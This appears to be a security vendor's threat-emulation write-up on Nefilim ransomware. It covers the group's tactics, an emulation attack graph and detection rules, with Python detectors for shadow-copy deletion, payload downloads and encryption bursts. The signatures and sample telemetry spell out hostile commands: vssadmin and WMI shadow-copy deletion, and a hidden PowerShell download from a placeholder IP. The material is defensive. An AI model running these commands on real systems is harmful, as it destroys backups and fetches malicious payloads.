Nefilim is a Ransomware-as-a-Service (RaaS) operation that emerged in March 2020 and is believed to have evolved from the Nemty ransomware family. This attribution rests on timing: Nefilim appeared just as Nemty’s operators left the RaaS business model to concentrate on more selective attacks with more dedicated resources. The author of Nemty is also known to have shared the ransomware source code with others.
Nefilim operates under a profit share model where operators earn 30% for their ransomware service and the remaining 70% goes to the affiliates who provide the network access and implement the active phase of the attack. Nefilim affiliates have targeted multiple North and South American organizations within financial, manufacturing, and transportation sectors.
It utilizes the double extortion technique, in which sensitive information is exfiltrated prior to encryption. In this way, if the ransom is not paid, the exfiltrated information is leaked over an extended period of time. It is one of the few adversaries that host leaked victim data long-term, for months to years, in order to influence future victims to comply with the demands.
Nefilim uses AES-128 encryption to lock files, and the AES key is in turn encrypted with an RSA-2048 public key embedded in the ransomware executable. In addition to the encrypted AES key, the ransomware adds the “NEFILIM” string as a file marker to every encrypted file. Once all files are encrypted and renamed with the .NEFILIM extension, the ransom note named ‘NEFILIM-DECRYPT.txt’ is dropped.
Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:
Since March 2020, Nefilim ransomware has been observed targeting organizations in the financial, manufacturing, and transportation sectors throughout North and South America. Nefilim has primarily been distributed through brute forcing of exposed Remote Desktop Protocol (RDP) services. Some affiliates have also been observed gaining initial access through unpatched or poorly secured Citrix gateway devices by abusing known vulnerabilities such as CVE-2019-11634 and CVE-2019-19781, identified in December 2019 and patched in January 2020.
Once an initial foothold is obtained, Nefilim uses several tools to gather credentials, including Mimikatz, LaZagne, and NirSoft’s NetPass. Nefilim then uses the stolen credentials to reach remote high-value systems via Remote Desktop Protocol (RDP). The adversary then drops and executes its components, such as antivirus-disabling tools, exfiltration tools, and finally Nefilim itself.
This attack graph seeks to emulate the sequence of behaviors associated with the deployment of Nefilim on a compromised system with the intent of providing customers with opportunities to prevent and/or detect a compromise in progress.
This stage begins with the deployment of a Cobalt Strike Beacon which aims to establish communications between the compromised system and the attacker’s infrastructure.
Once the initial foothold is achieved, the attack graph proceeds to retrieve credentials from the system through the deployment of the Mimikatz hacktool. If that is not possible, the LaZagne tool is employed as an alternative.
Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes for Windows accounts.
OS Credential Dumping (T1003): This scenario uses the open-source tool LaZagne to dump all possible credentials available on the host.
This stage is based on the discovery of system information both at the local level, such as the file system and available peripheral devices, and at the network level, such as remote systems, network shares, and active directories.
Leveraging the discovered information and obtained credentials, an attempt will then be made to move laterally to remote targets using the Remote Desktop Protocol (RDP).
File and Directory Discovery (T1083): This scenario uses the native dir command to find files of interest and output the results to a temporary file.
Peripheral Device Discovery (T1120): This scenario retrieves information about system peripherals such as logical drives, physical memory, and network cards through the execution of commands and binaries.
Remote System Discovery (T1018): This scenario performs a scan of the local network searching for any remotely accessible systems with ports 139, 389, 445, 636, or 3389 open.
Network Share Discovery (T1135): The native net tools are used to list all of the local mapped network shares with net share.
Remote System Discovery (T1018): This scenario will perform Active Directory discovery by leveraging the Adfind utility.
Remote Services: Remote Desktop Protocol (T1021.001): Remote Desktop is the built-in remote access utility used by Windows. This scenario attempts to remotely connect to another accessible asset with stolen credentials.
This stage begins with the deployment of Nefilim ransomware which, once executed, will be distributed over the network via PsExec and executed remotely via Windows Management Instrumentation (WMI).
Subsequently, it will attempt to bypass User Account Control (UAC) through registry modifications in order to elevate process privileges on the system.
Finally, the emulation will seek to collect and encrypt files on the system by mimicking the ransomware encryption routine.
Windows Management Instrumentation (T1047): This scenario attempts to move laterally to any available asset inside the network through the use of WMI. If the remote asset can be accessed, a configurable command is executed.
Bypass User Account Control (T1548.002): The malware attempts to disable UAC by setting a registry key.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using the same encryption algorithms observed in Nefilim ransomware.
In addition to the released assessment template, AttackIQ recommends the following scenario to extend the emulation of the capabilities exhibited by Nefilim ransomware.
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”)
MITRE ATT&CK has the following mitigation recommendations.
Preventing systems and files from being encrypted should be a top priority. Ensuring that you have layered endpoint defenses including Antivirus and EDR solutions is critical.
Ransomware attacks are best prevented and alerted on by your EDR/AV policies. Most products expose a dedicated ransomware-protection configuration, and we strongly encourage enabling it in your security controls.
There are three telling signs of ransomware activity in an environment that you can query for and, if your security controls allow, turn into preventative detections: deletion of shadow volumes, suspicious amounts of exfiltrated data, and of course, widespread file encryption.
Shadow volume deletion is usually the first of these to occur and can be detected by looking at command line activity:
Via vssadmin.exe:
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (“vssadmin” AND “Delete Shadows”)
Via PowerShell:
Process Name == powershell.exe
Command Line == “Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}”
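The download signature above and the two shadow-copy deletion signatures share one shape: a process-name filter plus an AND-of-ORs over command-line terms. The following is an added example, not AttackIQ code, that implements all three as rules and runs them over constructed process-creation events (hosts, IPs and paths are invented); it deliberately normalizes casing and whitespace, which loosens the page’s exact-match WMI signature into required substrings.

```python
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    host: str
    process: str        # image name as logged by the EDR, e.g. "powershell.exe"
    command_line: str

# Each rule: (rule name, allowed process names, term groups). The command line must
# contain at least one term from every group (an AND of ORs). Matching is
# case-insensitive with whitespace collapsed, so spacing or casing tricks do not
# defeat it; the WMI rule is therefore two substrings rather than an exact match.
RULES = [
    ("native_download_utility", {"cmd.exe", "powershell.exe"},
     [["iwr", "invoke-webrequest"], ["downloaddata"], ["hidden"]]),
    ("vssadmin_shadow_delete", {"cmd.exe", "powershell.exe"},
     [["vssadmin"], ["delete shadows"]]),
    ("wmi_shadow_delete", {"powershell.exe"},
     [["get-wmiobject win32_shadowcopy"], ["$_.delete()"]]),
]

def normalize(command_line: str) -> str:
    return " ".join(command_line.split()).lower()

def match_rules(event: ProcessEvent) -> list:
    """Return the names of every rule the event satisfies."""
    proc = event.process.lower()
    cmd = normalize(event.command_line)
    return [name for name, procs, groups in RULES
            if proc in procs and all(any(t in cmd for t in group) for group in groups)]

def scan(events) -> list:
    """Flatten (host, process, rule) hits over a stream of events."""
    return [(e.host, e.process, r) for e in events for r in match_rules(e)]

# Constructed sample telemetry (not from any real incident).
SAMPLE_EVENTS = [
    ProcessEvent("WS01", "powershell.exe",
                 "powershell.exe -WindowStyle Hidden -c \"$c=New-Object Net.WebClient; "
                 "$b=$c.DownloadData('http://192.0.2.10/x.bin'); IWR http://192.0.2.10/y\""),
    ProcessEvent("WS01", "cmd.exe", "cmd.exe /c vssadmin   Delete Shadows /All /Quiet"),
    ProcessEvent("SRV02", "powershell.exe",
                 "powershell.exe Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"),
    ProcessEvent("SRV02", "powershell.exe", "powershell.exe Get-WmiObject Win32_Shadowcopy"),
    ProcessEvent("WS03", "backup.exe", "backup.exe --delete-shadows"),  # wrong process: no hit
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```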
Detecting suspicious Data Exfiltration:
Detecting exfiltration is well suited to IDS/IPS and DLP solutions. These products should be configured to identify sensitive files. If sensitive files or a large volume of web traffic is sent to a rare external IP, it should be detected or prevented, depending on the security policies configured for the control. Historical NetFlow data logging can also surface hosts that are experiencing uncommon peaks in outgoing traffic.
Detecting Ransomware-like File Encryption:
Utilizing an EDR or SIEM/SOAR product can help detect and prevent suspicious file encryption related to ransomware attacks. Using these tools to look for excessive file modifications (more than 1000 on a single system) within less than a minute is a good starting indicator.
To increase the fidelity a bit, you could additionally look for files being renamed to popular ransomware extensions such as .conti, .Locky, .Ryuk, etc. If possible, with a SOAR or preventative EDR platform, we recommend configuring these detections to kill all processes involved in creating the alert, as this will most likely stop the spread of the ransomware.
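As an added example (not AttackIQ code), the burst heuristic above implemented as a sliding window over file-modification records: one alert per host/process pair that reaches 1000 modifications inside a window of under a minute, with the count of writes carrying a known ransomware extension used to raise severity. The telemetry is constructed for the example, and `.nefilim` is added to the page’s extension list.

```python
import os
from collections import defaultdict, deque

# Extensions the page lists as popular ransomware markers, plus Nefilim's own.
RANSOMWARE_EXTENSIONS = {".nefilim", ".conti", ".locky", ".ryuk"}

def detect_encryption_bursts(events, threshold=1000, window_seconds=60):
    """events: iterable of (timestamp_seconds, host, process, path) file-modification
    records. Raises one alert per (host, process) whose modifications reach
    `threshold` inside a sliding window shorter than `window_seconds`, and counts
    how many of those writes carry a known ransomware extension."""
    windows = defaultdict(deque)   # (host, process) -> deque of (ts, ransom_ext?)
    alerted, alerts = set(), []
    for ts, host, proc, path in sorted(events, key=lambda e: e[0]):
        key = (host, proc)
        q = windows[key]
        ext = os.path.splitext(path)[1].lower()
        q.append((ts, ext in RANSOMWARE_EXTENSIONS))
        while q and ts - q[0][0] >= window_seconds:   # keep strictly under one minute
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            ext_hits = sum(1 for _, flag in q if flag)
            alerts.append({
                "host": host, "process": proc, "modifications": len(q),
                "ransomware_extensions": ext_hits,
                "window_start": q[0][0], "window_end": ts,
                # Known ransomware extensions in the burst raise confidence; a SOAR
                # playbook would kill the responsible process tree on "high".
                "severity": "high" if ext_hits else "medium",
            })
            alerted.add(key)
    return alerts

def sample_events():
    """Constructed telemetry: one process rewriting 1,200 documents in ~24 s, half of
    them renamed to .NEFILIM, beside a backup job touching 50 files over 8 minutes."""
    events = []
    for i in range(1200):
        name = f"C:\\Users\\alice\\Documents\\report{i}.docx"
        events.append((1000.0 + i * 0.02, "WS01", "nefilim.exe",
                       name + ".NEFILIM" if i % 2 else name))
    for i in range(50):
        events.append((1000.0 + i * 10, "WS01", "backup.exe", f"D:\\backup\\vol{i}.bak"))
    return events

if __name__ == "__main__":
    for alert in detect_encryption_bursts(sample_events()):
        print(alert)
```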
MITRE ATT&CK Recommends the following mitigations:
In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the activities carried out by Nefilim ransomware operators. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.